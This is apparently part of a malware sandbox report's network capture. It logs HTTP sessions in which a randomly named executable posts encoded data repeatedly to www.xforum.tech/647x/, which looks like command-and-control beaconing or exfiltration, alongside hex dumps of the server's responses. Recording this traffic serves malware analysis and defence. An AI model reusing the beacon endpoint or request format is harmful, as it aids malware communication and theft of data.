                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                      Aug 26, 2024 18:28:53.260561943 CEST224INData Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
                                      Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify
                                      Aug 26, 2024 18:28:53.260576010 CEST1236INData Raw: 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20
                                      Data Ascii: -content: center;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent;
                                      Aug 26, 2024 18:28:53.260600090 CEST1236INData Raw: 32 32 2e 35 33 38 2d 32 32 2e 31 38 38 2d 32 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30
                                      Data Ascii: 22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55
                                      Aug 26, 2024 18:28:53.260612011 CEST1236INData Raw: 6c 6c 3d 22 23 45 36 41 39 35 46 22 20 64 3d 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38
                                      Data Ascii: ll="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3
                                      Aug 26, 2024 18:28:53.260629892 CEST672INData Raw: 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63
                                      Data Ascii: form="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.44
                                      Aug 26, 2024 18:28:53.260658026 CEST1236INData Raw: 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d
                                      Data Ascii: 86-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.5
                                      Aug 26, 2024 18:28:53.260670900 CEST1236INData Raw: 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d
                                      Data Ascii: 1.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.
                                      Aug 26, 2024 18:28:53.260685921 CEST448INData Raw: 2e 31 33 2e 35 32 31 2d 2e 30 35 34 20 31 2e 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e
                                      Data Ascii: .13.521-.054 1.021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.03
                                      Aug 26, 2024 18:28:53.260706902 CEST1236INData Raw: 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e
                                      Data Ascii: .366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.
                                      Aug 26, 2024 18:28:53.265657902 CEST1236INData Raw: 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34
                                      Data Ascii: 15.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.4


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.449759103.224.182.242805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:58.619807959 CEST742OUTPOST /647x/ HTTP/1.1
                                      Host: www.xforum.tech
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.xforum.tech
                                      Referer: http://www.xforum.tech/647x/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 38 67 68 35 75 6b 50 30 6c 55 43 6e 62 75 6b 77 39 69 2f 59 36 74 67 57 2b 57 39 42 49 34 68 47 36 31 6b 51 6f 71 74 55 4d 61 47 64 49 36 76 54 44 79 4e 65 37 65 62 4a 2b 41 4e 6d 2f 63 6f 56 53 6a 4a 74 79 67 4d 57 69 78 44 56 79 64 7a 32 6a 30 38 59 56 77 55 47 74 4f 4b 36 53 63 73 7a 5a 45 39 64 62 33 6d 68 2b 6b 73 77 66 56 6e 46 45 6b 2b 7a 64 41 6b 63 38 73 4c 2f 47 39 57 58 4e 74 64 36 36 4f 6e 79 67 4f 43 58 73 50 68 41 6e 65 64 74 6c 61 4b 50 6f 66 38 4a 34 42 58 74 61 72 73 2f 72 6a 39 51 50 4f 30 6e 74 64 38 6d 66 6a 30 66 4c 51 3d 3d
                                      Data Ascii: 3L9l=Ily3CeU2s+qA8gh5ukP0lUCnbukw9i/Y6tgW+W9BI4hG61kQoqtUMaGdI6vTDyNe7ebJ+ANm/coVSjJtygMWixDVydz2j08YVwUGtOK6ScszZE9db3mh+kswfVnFEk+zdAkc8sL/G9WXNtd66OnygOCXsPhAnedtlaKPof8J4BXtars/rj9QPO0ntd8mfj0fLQ==
                                      Aug 26, 2024 18:28:59.227731943 CEST872INHTTP/1.1 200 OK
                                      date: Mon, 26 Aug 2024 16:28:59 GMT
                                      server: Apache
                                      set-cookie: __tad=1724689739.4296456; expires=Thu, 24-Aug-2034 16:28:59 GMT; Max-Age=315360000
                                      vary: Accept-Encoding
                                      content-encoding: gzip
                                      content-length: 577
                                      content-type: text/html; charset=UTF-8
                                      connection: close
                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                                      Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.449760103.224.182.242805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:01.161868095 CEST762OUTPOST /647x/ HTTP/1.1
                                      Host: www.xforum.tech
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.xforum.tech
                                      Referer: http://www.xforum.tech/647x/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 56 47 36 58 38 51 76 62 74 55 4e 61 47 64 47 61 76 4b 48 79 4e 72 37 65 65 38 2b 46 4e 6d 2f 63 38 56 53 69 56 74 79 58 77 56 6a 68 44 62 72 4e 7a 30 6e 30 38 59 56 77 55 47 74 4b 69 45 53 66 63 7a 5a 30 74 64 63 6d 6d 69 68 55 73 33 57 31 6e 46 41 6b 2b 33 64 41 6b 75 38 74 6e 52 47 2f 75 58 4e 73 4e 36 36 66 6e 78 71 4f 43 56 7a 66 67 71 67 62 73 49 74 61 58 30 68 4f 73 49 36 67 6a 76 62 74 39 6c 36 53 63 48 64 4f 51 55 77 61 31 53 53 67 4a 57 51 63 70 32 48 34 59 46 4b 32 4f 71 71 76 30 46 4b 6f 31 69 7a 44 59 3d
                                      Data Ascii: 3L9l=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKVG6X8QvbtUNaGdGavKHyNr7ee8+FNm/c8VSiVtyXwVjhDbrNz0n08YVwUGtKiESfczZ0tdcmmihUs3W1nFAk+3dAku8tnRG/uXNsN66fnxqOCVzfgqgbsItaX0hOsI6gjvbt9l6ScHdOQUwa1SSgJWQcp2H4YFK2Oqqv0FKo1izDY=
                                      Aug 26, 2024 18:29:01.796082973 CEST872INHTTP/1.1 200 OK
                                      date: Mon, 26 Aug 2024 16:29:01 GMT
                                      server: Apache
                                      set-cookie: __tad=1724689741.3310780; expires=Thu, 24-Aug-2034 16:29:01 GMT; Max-Age=315360000
                                      vary: Accept-Encoding
                                      content-encoding: gzip
                                      content-length: 577
                                      content-type: text/html; charset=UTF-8
                                      connection: close
                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                                      Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.449761103.224.182.242805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:03.811546087 CEST10844OUTPOST /647x/ HTTP/1.1
                                      Host: www.xforum.tech
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.xforum.tech
                                      Referer: http://www.xforum.tech/647x/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 74 47 36 6b 30 51 73 38 5a 55 4b 61 47 64 4f 36 76 50 48 79 4e 4d 37 61 79 34 2b 46 78 70 2f 66 45 56 54 41 64 74 30 6d 77 56 73 68 44 62 6b 74 7a 33 6a 30 38 52 56 77 45 43 74 4f 47 45 53 66 63 7a 5a 32 46 64 4b 6e 6d 69 79 45 73 77 66 56 6e 5a 45 6b 2b 66 64 45 41 2b 38 74 54 76 47 4d 6d 58 44 73 39 36 35 70 62 78 69 4f 43 54 77 66 67 79 67 62 6f 62 74 61 36 50 68 4f 5a 74 36 67 58 76 62 59 77 71 6e 78 59 46 4f 38 4a 4a 6c 64 52 5a 56 7a 56 6a 51 72 6c 63 45 59 6b 6a 58 56 75 4f 71 50 77 56 65 49 78 6f 6c 7a 6d 31 5a 34 70 49 43 6f 79 30 65 49 6f 57 68 34 62 42 77 52 31 65 53 71 59 35 70 49 53 4b 32 4d 48 52 48 4d 65 79 56 6a 67 44 4b 77 61 6c 4c 72 7a 58 6c 59 56 49 51 2f 68 6a 45 6e 6d 54 6f 56 45 79 73 72 64 79 6a 31 37 49 73 2f 64 69 6a 30 71 75 6e 42 30 6f 69 42 4d 42 51 51 44 68 50 39 73 68 57 4b 72 4a 61 6e 33 6e 58 30 49 39 32 62 45 53 65 6a 59 64 59 [TRUNCATED]
                                      Data Ascii: 3L9l=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKtG6k0Qs8ZUKaGdO6vPHyNM7ay4+Fxp/fEVTAdt0mwVshDbktz3j08RVwECtOGESfczZ2FdKnmiyEswfVnZEk+fdEA+8tTvGMmXDs965pbxiOCTwfgygbobta6PhOZt6gXvbYwqnxYFO8JJldRZVzVjQrlcEYkjXVuOqPwVeIxolzm1Z4pICoy0eIoWh4bBwR1eSqY5pISK2MHRHMeyVjgDKwalLrzXlYVIQ/hjEnmToVEysrdyj17Is/dij0qunB0oiBMBQQDhP9shWKrJan3nX0I92bESejYdYucQ4t+s3OmFkVYXAEjs/nxJtj1p7ptZ0Wzpr5lLnxH+p+rZG6XEtTboffvSr86jXaCwvYQcmnDbP0LyP/RxR93LuJ9V8eitX37k7XXp245qu1X+IZvQ5gm24SNsbSKJ8TwZrq0PW4A93BjO4Y/ezn4eIHdgyAZijHUzK5tNMSm9G3OTs4CAyK2E8vz0933E5HJVr1al54pe2aQHJfqPT4l8Lib3x7h/N6Q3HHNhrmcH8RV+fY7MHqscnPvgl9jKLycTZBvC0ntgoo/OIDJaJKhviWuZBW10cA/vLthZ0GjpsfXfc6Yzr9I9dGcKsju2yMCOmFcS/tIZvdkxo7OiZ1130spMtmdjGQNmYdi/sh7HdIa/V4bR1cMDRa6C8J+pWo2S5LsC/tlgSOfbdFvceGnphd05XlHkjoaIksFzFP7e8Ui9fMoHcbYrunu/hwLEPcP0cRXCb16E4mJnmKM6ERyTfvX19MyKoD+8oUdKRFzlE4OPMHVIS5gpyBh6KvAnzotNGLB3kdxasu4XZcjwQ/QVRboTcGbfxUdFAaf+etGALg9FwxJGUqSTTiP5dFX1CiWd4ODV4EWQ4q0eri84WVr996UjGgbohekmofAVfMwbzUvTZpDDgf7AenwKbqBqLZJng4THAoIKx0ch3FaTQefwugJOKh2nJEt [TRUNCATED]
                                      Aug 26, 2024 18:29:04.481363058 CEST872INHTTP/1.1 200 OK
                                      date: Mon, 26 Aug 2024 16:29:04 GMT
                                      server: Apache
                                      set-cookie: __tad=1724689744.5631408; expires=Thu, 24-Aug-2034 16:29:04 GMT; Max-Age=315360000
                                      vary: Accept-Encoding
                                      content-encoding: gzip
                                      content-length: 577
                                      content-type: text/html; charset=UTF-8
                                      connection: close
                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                                      Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.449762103.224.182.242805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:06.358953953 CEST481OUTGET /647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.xforum.tech
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:29:06.991321087 CEST1236INHTTP/1.1 200 OK
                                      date: Mon, 26 Aug 2024 16:29:06 GMT
                                      server: Apache
                                      set-cookie: __tad=1724689746.5091635; expires=Thu, 24-Aug-2034 16:29:06 GMT; Max-Age=315360000
                                      vary: Accept-Encoding
                                      content-length: 1476
                                      content-type: text/html; charset=UTF-8
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 78 66 6f 72 75 6d 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 33 4c 39 6c 3d 46 6e 61 58 42 6f 78 35 34 2b 61 67 37 67 35 69 77 6d 50 36 6c 45 75 61 59 72 4e 79 39 78 66 34 33 65 52 63 68 68 4a 79 48 63 78 6a 32 6e 42 73 76 5a 5a 54 54 6f 66 42 44 75 44 72 54 52 78 44 77 4a 53 2f 78 6c 78 71 32 38 77 46 62 43 4a 37 6f 6b 55 70 68 30 50 59 70 4f 47 75 73 52 67 42 54 43 74 69 30 2b 47 71 52 66 39 4e 59 45 4a 33 4d 33 6e 49 67 33 73 3d 26 6b 5a 72 30 3d 68 74 2d 6c 45 6c 79 68 26 [TRUNCATED]
